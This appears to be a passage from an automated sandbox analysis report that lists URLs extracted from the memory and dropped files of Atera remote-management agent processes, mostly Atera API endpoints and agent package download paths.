                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmp, AlphaControlAgentInstallation.dll.5.dr, AlphaControlAgentInstallation.dll.6.dr, AlphaControlAgentInstallation.dll.18.dr, AlphaControlAgentInstallation.dll.4.drString found in binary or memory: https://agent-api.atera.com/
                              Source: AgentPackageAgentInformation.exe, 00000013.00000002.1777274260.000002AC50783000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2229922038.000002C4536AF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2391164954.0000020EC410F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmp, AlphaControlAgentInstallation.dll.5.dr, AlphaControlAgentInstallation.dll.6.dr, AlphaControlAgentInstallation.dll.18.dr, AlphaControlAgentInstallation.dll.4.drString found in binary or memory: https://agent-api.atera.com/Production/Agent/
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AcknowledgeCommands
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AcknowledgeCommands0H
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/Age
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FAA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B41000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AgentStarting
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AgentStarting)
                              Source: AgentPackageAgentInformation.exe, 00000013.00000002.1777274260.000002AC50783000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2229922038.000002C4536AF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2391164954.0000020EC410F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/CommandResult
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FD3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommands
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommands)
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommandsFallback
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommandsp
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetEnvironmentStatus
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurringPackages
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurringPackagesckNTIALBACKOFF02ceca8-a958-11e5-bd8
                              Source: rundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/track-event
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2644921266.00000188B0072000.00000002.00000001.01000000.0000001C.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000002.1778395763.000002AC68ED2000.00000002.00000001.01000000.0000001B.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.15.dr, Newtonsoft.Json.dll.18.drString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                              Source: System.ValueTuple.dll.2.drString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf
                              Source: System.ValueTuple.dll.2.drString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf8
                              Source: AteraAgent.exe, 0000000F.00000002.2649410681.00000188B0742000.00000002.00000001.01000000.0000001D.sdmp, ICSharpCode.SharpZipLib.dll.2.drString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/Agent
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageA
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageA0H
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAgentI
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAkageA
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.000001889776E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.Availability/0.16/Agent.Package.Availability.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.000001889776E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.Watchdog/1.7/Agent.Package.Watchdog.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageADRemote/6.0/AgentPackageADRemote.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977E4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageAgentInformation/38.0/AgentPackageAgentInformation
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageNetworkDiscovery/13.0/AgentPackageNetworkDiscovery
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageOsUpdates/20.9/AgentPackageOsUpdates.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageProgramManagement/26.3/AgentPackageProgramManageme
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageRuntimeInstaller/1.5/AgentPackageRuntimeInstaller.
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageTaskScheduler/13.0/AgentPackageTaskScheduler.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageWindowsUpdate/24.6/AgentPackageWindowsUpdate.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.000001889776E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Availability/0.16/Agent.Package.Availability.z
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.000001889776E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Watchdog/1.7/Agent.Package.Watchdog.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977E4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageAgentInformation/38.0/AgentPackageAgentInformati
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zip0H
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageInternalPoller/23.8/AgentPackageInternalPoller.z
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageNetworkDiscovery/23.9/AgentPackageNetworkDiscove
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageOsUpdates/20.9/AgentPackageOsUpdates.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageProgramManagement/26.3/AgentPackageProgramMana
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageProgramManagement/26.3/AgentPackageProgramManage
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageRuntimeInstaller/1.6/AgentPackageRuntimeInstalle
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/24.2/AgentPackageSTRemote.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/27.8/AgentPackageSystemTools.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/30.1/AgentPackageTicketing.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageUpgradeAgent/27.6/AgentPackageUpgradeAgent.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageWindowsUpdate/24.6/AgentPackageWindowsUpdate.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.000001889776E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.Availability/13.0/Agent.Package.Availability.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977DC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.IotPoc/13.0/Agent.Package.IotPoc.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.000001889776E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.Watchdog/13.0/Agent.Package.Watchdog.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188977E4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageAgentInformation/22.7/AgentPackageAgentInformation
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageNetworkDiscovery/15.0/AgentPackageNetworkDiscovery
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageOsUpdates/1.0/AgentPackageOsUpdates.zip
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188977FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageProgramManagement/15.5/AgentPackageProgramManageme
